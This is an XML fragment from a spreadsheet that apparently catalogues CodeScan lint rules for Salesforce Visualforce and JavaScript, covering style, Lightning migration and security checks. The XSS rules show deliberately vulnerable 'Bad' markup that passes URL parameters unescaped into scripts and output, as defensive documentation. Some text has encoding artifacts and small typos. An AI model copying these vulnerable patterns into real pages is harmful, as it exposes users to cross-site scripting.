  <si>
    <t>vf:InputImgWithoutWidthOrHeightCheck</t>
  </si>
  <si>
    <t>Image buttons should always have a "width" and a "height" attribute</t>
  </si>
  <si>
    <t>If the &lt;code&gt;width&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; attributes are set, the space required for the image is reserved immediately by the browser, even before it actually starts to load the image.
Without those attributes, the page layout constantly changes as images are loaded until they are all loaded, which can disorient users.
&lt;p&gt;The following code:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;img src="logo.png" alt="My Company" /&amp;gt;                           //Bad: this is not recommended.
&lt;/pre&gt;
should be refactored into:
&lt;pre&gt;
&amp;lt;img src="logo.png" alt="My Company" width="100" height="50" /&amp;gt;   //Good: this is preferred.
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LightningIframeCheck</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for apex:iframe</t>
  </si>
  <si>
    <t>This rule looks for apex:iframe usage which may no longer work in lightning.
Although apex:iframe is supported in Lightning Experience, we recommend avoiding it.
Only use this component if you're comfortable working with iframes in JavaScript and understand how they affect the DOM. If you haven't worked with nested iframes before, you might run into problems that are difficult to debug.
See &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;apex:page&amp;gt;
	&amp;lt;apex:iframe&amp;gt;&amp;lt;/apex:iframe&amp;gt; //Bad: not recommended.
&amp;lt;/apex:page&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidLinkingToRecordIds</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for Hard Coded ID Links</t>
  </si>
  <si>
    <t>HREF may link directly to Salesforce record.  An anchor tag refers directly to a record ID on this page.
Direct links to records aren't supported in Lightning Experience.
To view, create, or edit records, use actions and functions rather than direct URLs. For example, use
{!URLFOR($Action.Contact.Edit, recordId)}
to edit a contact record in Visualforce markup, or navigateToSObject(recordId) in JavaScript.
See &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;a href="/030000000123"&amp;gtl;Click here&amp;lt;/a&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>common-vf:InsufficientBranchCoverage</t>
  </si>
  <si>
    <t>common-vf:InsufficientLineCoverage</t>
  </si>
  <si>
    <t>common-vf:InsufficientCommentDensity</t>
  </si>
  <si>
    <t>common-vf:DuplicatedBlocks</t>
  </si>
  <si>
    <t>common-vf:SkippedUnitTests</t>
  </si>
  <si>
    <t>common-vf:FailedUnitTests</t>
  </si>
  <si>
    <t>cs-vf:no-unused-expressions</t>
  </si>
  <si>
    <t>disallow unused expressions</t>
  </si>
  <si>
    <t>&lt;p&gt;An unused expression which has no effect on the state of the program indicates a logic error.&lt;/p&gt;
&lt;p&gt;For example, &lt;code&gt;n + 1;&lt;/code&gt; is not a syntax error, but it might be a typing mistake where a programmer meant an assignment statement &lt;code&gt;n += 1;&lt;/code&gt; instead.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule aims to eliminate unused expressions which have no effect on the state of the program.&lt;/p&gt;
&lt;p&gt;This rule does not apply to function calls or constructor calls with the &lt;code&gt;new&lt;/code&gt; operator, because they could have &lt;em&gt;side effects&lt;/em&gt; on the state of the program.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var i = 0;
function increment() { i += 1; }
increment(); // return value is unused, but i changed as a side effect
var nThings = 0;
function Thing() { nThings += 1; }
new Thing(); // constructed object is unused, but nThings changed as a side effect
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This rule does not apply to directives (which are in the form of literal string expressions such as &lt;code&gt;"use strict";&lt;/code&gt; at the beginning of a script, module, or function).&lt;/p&gt;
&lt;p&gt;Sequence expressions (those using a comma, such as &lt;code&gt;a = 1, b = 2&lt;/code&gt;) are always considered unused unless their return value is assigned or used in a condition evaluation, or a function call is made with the sequence expression value.&lt;/p&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule, in its default state, does not require any arguments. If you would like to enable one or more of the following you may pass an object with the options set as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;allowShortCircuit&lt;/code&gt; set to &lt;code&gt;true&lt;/code&gt; will allow you to use short circuit evaluations in your expressions (Default: &lt;code&gt;false&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;allowTernary&lt;/code&gt; set to &lt;code&gt;true&lt;/code&gt; will enable you to use ternary operators in your expressions similarly to short circuit evaluations (Default: &lt;code&gt;false&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;allowTaggedTemplates&lt;/code&gt; set to &lt;code&gt;true&lt;/code&gt; will enable you to use tagged template literals in your expressions (Default: &lt;code&gt;false&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These options allow unused expressions &lt;em&gt;only if all&lt;/em&gt; of the code paths either directly change the state (for example, assignment statement) or could have &lt;em&gt;side effects&lt;/em&gt; (for example, function call).&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the default &lt;code&gt;{ "allowShortCircuit": false, "allowTernary": false }&lt;/code&gt; options:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: "error"*/
0
if(0) 0
{0}
f(0), {}
a &amp;amp;&amp;amp; b()
a, b()
c = a, b;
a() &amp;amp;&amp;amp; function namedFunctionInExpressionContext () {f();}
(function anIncompleteIIFE () {});
injectGlobal`body{ color: red; }`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note that one or more string expression statements (with or without semi-colons) will only be considered as unused if they are not in the beginning of a script, module, or function (alone and uninterrupted by other statements). Otherwise, they will be treated as part of a "directive prologue", a section potentially usable by JavaScript engines. This includes "strict mode" directives.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;"use strict";
"use asm"
"use stricter";
"use babel"
"any other strings like this in the prologue";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the default &lt;code&gt;{ "allowShortCircuit": false, "allowTernary": false }&lt;/code&gt; options:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: "error"*/
{} // In this context, this is a block statement, not an object literal
{myLabel: someVar} // In this context, this is a block statement with a label and expression, not an object literal
function namedFunctionDeclaration () {}
(function aGenuineIIFE () {}());
f()
a = 0
new C
delete a.b
void a
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="allowshortcircuit"&gt;allowShortCircuit&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;{ "allowShortCircuit": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowShortCircuit": true }]*/
a || b
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "allowShortCircuit": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowShortCircuit": true }]*/
a &amp;amp;&amp;amp; b()
a() || (b = c)
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="allowternary"&gt;allowTernary&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;{ "allowTernary": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowTernary": true }]*/
a ? b : 0
a ? b : c()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "allowTernary": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowTernary": true }]*/
a ? b() : c()
a ? (b = c) : d()
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="allowshortcircuitandallowternary"&gt;allowShortCircuit and allowTernary&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "allowShortCircuit": true, "allowTernary": true }&lt;/code&gt; options:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowShortCircuit": true, "allowTernary": true }]*/
a ? b() || (c = d) : e()
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="allowtaggedtemplates"&gt;allowTaggedTemplates&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;{ "allowTaggedTemplates": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowTaggedTemplates": true }]*/
`some untagged template string`;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "allowTaggedTemplates": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowTaggedTemplates": true }]*/
tag`some tagged template string`;
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:UnescapedAttributes</t>
  </si>
  <si>
    <t>Unescaped Value Could Cause XSS</t>
  </si>
  <si>
    <t>Reflected Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response.&lt;br/&gt;
&lt;br/&gt;
Using unescaped parameters can be a security risk.
&lt;br/&gt;
c:* and apex:* attributes are not checked unless they are known to cause problems. You can check other attributes by adding them to the configuration for this rule.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_scontrols.htm"&gt;Unescaped Output and Formulas in Visualforce Pages&lt;/a&gt;&lt;/li&gt;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&amp;lt;apex:includeScript value="{!$CurrentPage.parameters.userInput}" /&amp;gt; //Bad: not recommended.
&amp;lt;apex:outputText value="{! data }" escape="false" /&amp;gt; //Bad: not recommended.
&amp;lt;div onclick = "console.log('{!$CurrentPage.parameters.userInput}')"&amp;gt;Click me!&amp;lt;/div&amp;gt; //Bad: not recommended.
&amp;lt;div onclick = "console.log('{!JSENCODE($CurrentPage.parameters.userInput)}')"&amp;gt;Click me!&amp;lt;/div&amp;gt; //Good: this is better.
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:UnencodedScript</t>
  </si>
  <si>
    <t>Unencoded Formulas in Script Tags XSS</t>
  </si>
  <si>
    <t>Makes sure that all values obtained from URL parameters are properly escaped / sanitized to avoid XSS attacks.&lt;br/&gt;
Input can be sanitized JSENCODE().&lt;br/&gt;
&lt;br/&gt;
Using unescaped parameters can be a security risk. 
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_scontrols.htm"&gt;Unescaped Output and Formulas in Visualforce Pages&lt;/a&gt;&lt;/li&gt;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&amp;lt;script&amp;gt;
	var value = {!$CurrentPage.parameters.username}'; //Bad: not recommended.
	var value = {!JSONENCODE($CurrentPage.parameters.username)}'; //Good: this is preferred.
&amp;lt;/script&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:npm-audit</t>
  </si>
  <si>
    <t>Auditing npm dependencies for security vulnerabilities</t>
  </si>
  <si>
    <t>&lt;p&gt;There is a plethora of JavaScript libraries for use on the Web and in Node.JS apps.
This greatly simplifies development, but you need to stay up-to-date on security fixes.&lt;/p&gt;
&lt;p&gt;According to &lt;a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"&gt;OWASP Top 10 Most Critical Web Application Security Risks&lt;/a&gt;, using Components (ie. dependencies) with known vulnerabilities is ranked 9th, and there are many known stories of security breaches provided by (malicious or not) third-party dependencies.&lt;/p&gt;
&lt;p&gt;This rule inspects package-lock.json file inside your project and identifies if used npm dependencies have any known Common Vulnerabilities and Exposures (CVE).
The rule relies on &lt;a href="https://github.com/advisories?query=ecosystem%3Anpm"&gt;GitHub Advisory Database&lt;/a&gt;.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:unsecure-js-dependency</t>
  </si>
  <si>
    <t>Auditing js dependencies for security vulnerabilities</t>
  </si>
  <si>
    <t>&lt;p&gt;There is a plethora of JavaScript libraries for use on the Web and in Node.JS apps.
This greatly simplifies development, but you need to stay up-to-date on security fixes.&lt;/p&gt;
&lt;p&gt;According to &lt;a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"&gt;OWASP Top 10 Most Critical Web Application Security Risks&lt;/a&gt;, using Components (ie. dependencies) with known vulnerabilities is ranked 9th, and there are many known stories of security breaches provided by (malicious or not) third-party dependencies.&lt;/p&gt;
&lt;p&gt;This rule identifies the open source JS components inside your project and evaluates if there are any known Common Vulnerabilities and Exposures (CVE) for their versions.&lt;/p&gt;</t>
  </si>
  <si>
    <t>vf:AvoidTabCharacter</t>
  </si>
  <si>
    <t>Checks that there are no tab characters ('\t') in the source code.
      &lt;p&gt;The code snippet illustrates this rule:&lt;/p&gt;
      &lt;pre&gt;
      &amp;lt;head&amp;gt;
      &amp;lt;meta http-equiv="refresh" content="5"&amp;gt;   //Bad: this is not recommended.
      &amp;lt;meta name="description" content="..."&amp;gt;
      &amp;lt;/head&amp;gt;
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-irregular-whitespace</t>
  </si>
  <si>
    <t>disallow irregular whitespace outside of strings and comments</t>
  </si>
  <si>
    <t>&lt;p&gt;Invalid or irregular whitespace causes issues with ECMAScript 5 parsers and also makes code harder to debug in a similar nature to mixed tabs and spaces.&lt;/p&gt;
&lt;p&gt;Various whitespace characters can be inputted by programmers by mistake for example from copying or keyboard shortcuts. Pressing Alt + Space on macOS adds in a non breaking space character for example.&lt;/p&gt;
&lt;p&gt;Known issues these spaces cause:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Zero Width Space&lt;ul&gt;
&lt;li&gt;Is NOT considered a separator for tokens and is often parsed as an &lt;code&gt;Unexpected token ILLEGAL&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Is NOT shown in modern browsers making code repository software expected to resolve the visualization&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Line Separator&lt;ul&gt;
&lt;li&gt;Is NOT a valid character within JSON which would cause parse errors&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule is aimed at catching invalid whitespace that is not a normal tab and space. Some of these characters may cause issues in modern browsers and others will be a debugging issue to spot.&lt;/p&gt;
&lt;p&gt;This rule disallows the following characters except where the options allow:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\u000B - Line Tabulation (\v) - &amp;lt;VT&amp;gt;
\u000C - Form Feed (\f) - &amp;lt;FF&amp;gt;
\u00A0 - No-Break Space - &amp;lt;NBSP&amp;gt;
\u0085 - Next Line
\u1680 - Ogham Space Mark
\u180E - Mongolian Vowel Separator - &amp;lt;MVS&amp;gt;
\ufeff - Zero Width No-Break Space - &amp;lt;BOM&amp;gt;
\u2000 - En Quad
\u2001 - Em Quad
\u2002 - En Space - &amp;lt;ENSP&amp;gt;
\u2003 - Em Space - &amp;lt;EMSP&amp;gt;
\u2004 - Tree-Per-Em
\u2005 - Four-Per-Em
\u2006 - Six-Per-Em
\u2007 - Figure Space
\u2008 - Punctuation Space - &amp;lt;PUNCSP&amp;gt;
\u2009 - Thin Space
\u200A - Hair Space
\u200B - Zero Width Space - &amp;lt;ZWSP&amp;gt;
\u2028 - Line Separator
\u2029 - Paragraph Separator
\u202F - Narrow No-Break Space
\u205f - Medium Mathematical Space
\u3000 - Ideographic Space
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule has an object option for exceptions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;"skipStrings": true&lt;/code&gt; (default) allows any whitespace characters in string literals&lt;/li&gt;
&lt;li&gt;&lt;code&gt;"skipComments": true&lt;/code&gt; allows any whitespace characters in comments&lt;/li&gt;
&lt;li&gt;&lt;code&gt;"skipRegExps": true&lt;/code&gt; allows any whitespace characters in regular expression literals&lt;/li&gt;
&lt;li&gt;&lt;code&gt;"skipTemplates": true&lt;/code&gt; allows any whitespace characters in template literals&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="skipstrings"&gt;skipStrings&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule with the default &lt;code&gt;{ "skipStrings": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: "error"*/
function thing()&amp;amp;nbsp;/*&amp;lt;NBSP&amp;gt;*/{
    return 'test';
}
function thing(&amp;amp;nbsp;/*&amp;lt;NBSP&amp;gt;*/){
    return 'test';
}
function thing&amp;amp;nbsp;/*&amp;lt;NBSP&amp;gt;*/(){
    return 'test';
}
function thingá Ž/*&amp;lt;MVS&amp;gt;*/(){
    return 'test';
}
function thing() {
    return 'test';â€‚/*&amp;lt;ENSP&amp;gt;*/
}
function thing() {
    return 'test';&amp;amp;nbsp;/*&amp;lt;NBSP&amp;gt;*/
}
function thing() {
    // Description&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;: some descriptive text
}
/*
Description&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;: some descriptive text
*/
function thing() {
    return /&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;regexp/;
}
/*eslint-env es6*/
function thing() {
    return `templateâ€‚&amp;lt;NBSP&amp;gt;string`;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the default &lt;code&gt;{ "skipStrings": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: "error"*/
function thing() {
    return '&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;thing';
}
function thing() {
    return 'â€‹&amp;lt;ZWSP&amp;gt;thing';
}
function thing() {
    return 'th&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;ing';
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="skipcomments"&gt;skipComments&lt;/h3&gt;
&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "skipComments": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: ["error", { "skipComments": true }]*/
function thing() {
    // Description&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;: some descriptive text
}
/*
Description&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;: some descriptive text
*/
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="skipregexps"&gt;skipRegExps&lt;/h3&gt;
&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "skipRegExps": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: ["error", { "skipRegExps": true }]*/
function thing() {
    return /&amp;amp;nbsp;&amp;lt;NBSP&amp;gt;regexp/;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="skiptemplates"&gt;skipTemplates&lt;/h3&gt;
&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "skipTemplates": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-irregular-whitespace: ["error", { "skipTemplates": true }]*/
/*eslint-env es6*/
function thing() {
    return `templateâ€‚&amp;lt;NBSP&amp;gt;string`;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you decide that you wish to use whitespace other than tabs and spaces outside of strings in your application.&lt;/p&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;[ECMA whitespace](https://es5.github.io/#x7.2 \xA0)&lt;/li&gt;
&lt;li&gt;&lt;a href="http://timelessrepo.com/json-isnt-a-javascript-subset"&gt;JSON whitespace issues&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>vf:AvoidHighActionPollerInterval</t>
  </si>
  <si>
    <t>Avoid High apex:actionpoller Interval</t>
  </si>
  <si>
    <t>Action methods used by &amp;lt;apex:actionPoller&amp;gt; should be lightweight. Itâ€™s a best practice to avoid performing DML, external service calls, and other resource-intensive operations in action methods called by an &amp;lt;apex:actionPoller&amp;gt;. Carefully consider the effect of your action method being called repeatedly by an &amp;lt;apex:actionPoller&amp;gt; at the interval you specify, especially if itâ€™s used on a page that will be widely distributed, or open continuously.
See &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_best_practices_performance.htm"&gt;Best Practices for Improving Visualforce Performance&lt;/a&gt;
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;apex:page controller="ExampleController"&amp;gt;
    &amp;lt;apex:form&amp;gt;
        &amp;lt;apex:outputText value="Watch this counter: {!count}" id="counter"/&amp;gt;
        &amp;lt;apex:actionPoller action="{!incrementCounter}" reRender="counter" interval="30"/&amp;gt;  //Bad: An interval of 30 may be too high.
    &amp;lt;/apex:form&amp;gt;
&amp;lt;/apex:page&amp;gt;
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:MetaRefreshCheck</t>
  </si>
  <si>
    <t>Meta Tags Should Not Be Used to Refresh or Redirect</t>
  </si>
  <si>
    <t>&lt;p&gt;
Use of &lt;code&gt;&amp;lt;meta http-equiv="refresh"&amp;gt;&lt;/code&gt; is discouraged by the World Wide Web Consortium (W3C).
If a user clicks the 'Back' button, some browers will go back to the redirecting page, which will prevent the user from actually going back.
&lt;/p&gt;
&lt;p&gt;
To refresh the page, a better alternative is to use Ajax, to refresh only what needs to be refreshed and not the whole page.
To redirect to another page, using the HTTP response status code 301 'Moved Permanently' and 302 'Found' is a better option.
&lt;/p&gt;
&lt;p&gt;The code snippet illustrates this rule:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;head&amp;gt;
  &amp;lt;meta http-equiv="refresh" content="5"&amp;gt;   //Bad: this is not recommended.
  &amp;lt;meta name="description" content="..."&amp;gt;
&amp;lt;/head&amp;gt;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:PasswordAutocompleteCheck</t>
  </si>
  <si>
    <t>"autocomplete" Should Be Set to "off" on Input Elements of Type "password"</t>
  </si>
  <si>
    <t>&lt;p&gt;
Most browsers automatically fill the content of input elements of type 'password' when this password has already been provided in the past.
&lt;/p&gt;
&lt;p&gt;
Imagine that user B takes control of a machine belonging to a user A.
Accessing a secured web site as user A is trivial for user B if form input elements are automatically filled in by the browser on the site's login page.
&lt;/p&gt;
To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete="off" within the FORM tag
&lt;pre&gt;
&amp;lt;input type="password" /&amp;gt;		//Bad: not recommended.
&lt;/pre&gt;
&lt;pre&gt;
&amp;lt;input type="password" autocomplete="off" /&amp;gt; 		//Good: autocomplete set to off is preferred.
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LightningAvoidUsingSession</t>
  </si>
  <si>
    <t>Avoid using GETSESSIONID() and $API.Session_Id</t>
  </si>
  <si>
    <t>Lightning Experience does not have access to the API session token. Visualforce pages used within Lightning Experience, however, still have API access to the session ID.&lt;br/&gt;
Test Visualforce pages that access the session ID within Lightning Experience.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;Considerations Before Transitioning to Lightning Experience&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
//The below will need to be checked in lightning experience.
&amp;lt;apex:page&amp;gt;
&amp;lt;script&amp;gt;
  var __sfdcSessionId = '{!GETSESSIONID()}';
  var sr = new SOAPRequest({orgNameSpace: "BKSL2", sessionId : __sfdcSessionId, endPointName: "SETUP_Organization_WS"});
&amp;lt;/script&amp;gt;
&amp;lt;/apex:page&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:OldPageApiVersion</t>
  </si>
  <si>
    <t>API Version is Too Old</t>
  </si>
  <si>
    <t>This rule identifies classes which are using older versions of the API. Change the API Version of this class.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&gt;
&amp;lt;ApexClass xmlns="http://soap.sforce.com/2006/04/metadata"&gt;
    &amp;lt;apiVersion&gt;19.0&amp;lt;/apiVersion&gt;
    &amp;lt;status&gt;Active&amp;lt;/status&gt;
&amp;lt;/ApexClass&gt;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:DoubleQuotesCheck</t>
  </si>
  <si>
    <t>Use Double Quotes to Define Attributes</t>
  </si>
  <si>
    <t>Double quotes should be used to define attributes in VisualForce.  
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;apex:page&amp;gt;
  &amp;lt;html&amp;gt;
    &amp;lt;div class='foo'&amp;gt;   //Bad: not recommended.
      &amp;lt;div class="bar"&amp;gt;  //Good: double quotes are preferred.
      &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
  &amp;lt;/html&amp;gt;
&amp;lt;/apex:page&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:NoOnClickJavascript</t>
  </si>
  <si>
    <t>Remove OnClick Javascript</t>
  </si>
  <si>
    <t>Javascript in "onclick", "onmouseover" and similar actions within Lightning components is ignored.  This could cause problems you are migrating to Lightning.  These actions should be used to invoke actions from the controller instead.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;aura:component&amp;gt;
  &amp;lt;input type="button" value="Flawed HTML Button" onclick="alert('bad')"/&amp;gt;  //Bad: This will not work.
  &amp;lt;lightning:button label="Framework Button" onclick="{!c.handleClick}"/&amp;gt;    //Good: This uses the controller action handleClick.
&amp;lt;/aura:component&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:APIVersionsRetired</t>
  </si>
  <si>
    <t>vf:AccessibleLwc</t>
  </si>
  <si>
    <t>Use Accessibility Attributes</t>
  </si>
  <si>
    <t>Updating your LWC components with certain attributes can make your components more accessible to differently abled users.</t>
  </si>
  <si>
    <t>vf:AvoidJavaScriptScriptlets</t>
  </si>
  <si>
    <t>Avoid JavaScript Scriptlets in Aura Components and Apex Pages</t>
  </si>
  <si>
    <t>JavaScript scriptlets should not be directly embedded within the markup of Aura components or Apex pages. Instead, utilize Salesforce Static resources for including JavaScript code. Using direct &lt;script&gt; tags in components or pages can pose a security risk, increasing the likelihood of cross-site scripting (XSS) attacks.</t>
  </si>
  <si>
    <t>CodeScan JAVASCRIPT RULES</t>
  </si>
  <si>
    <t>cs-js:no-console</t>
  </si>
  <si>
    <t>JavaScript</t>
  </si>
  <si>
    <t>cs-js:no-control-regex</t>
  </si>
  <si>
    <t>cs-js:no-octal-escape</t>
  </si>
  <si>
    <t>cs-js:no-catch-shadow</t>
  </si>
  <si>
    <t>cs-js:no-floating-decimal</t>
  </si>
  <si>
    <t>cs-js:no-new-wrappers</t>
  </si>
  <si>
    <t>cs-js:no-shadow-restricted-names</t>
  </si>
  <si>
    <t>cs-js:no-empty-character-class</t>
  </si>
  <si>
    <t>cs-js:no-new-object</t>
  </si>
  <si>
    <t>cs-js:no-extend-native</t>
  </si>
  <si>
    <t>cs-js:no-obj-calls</t>
  </si>
  <si>
    <t>cs-js:no-extra-bind</t>
  </si>
  <si>
    <t>cs-js:no-undef</t>
  </si>
  <si>
    <t>cs-js:wrap-iife</t>
  </si>
  <si>
    <t>cs-js:no-func-assign</t>
  </si>
  <si>
    <t>cs-js:no-regex-spaces</t>
  </si>
  <si>
    <t>cs-js:secure-document</t>
  </si>
  <si>
    <t>cs-js:no-implied-eval</t>
  </si>
  <si>
    <t>cs-js:ecma-intrinsics</t>
  </si>
  <si>
    <t>cs-js:no-div-regex</t>
  </si>
  <si>
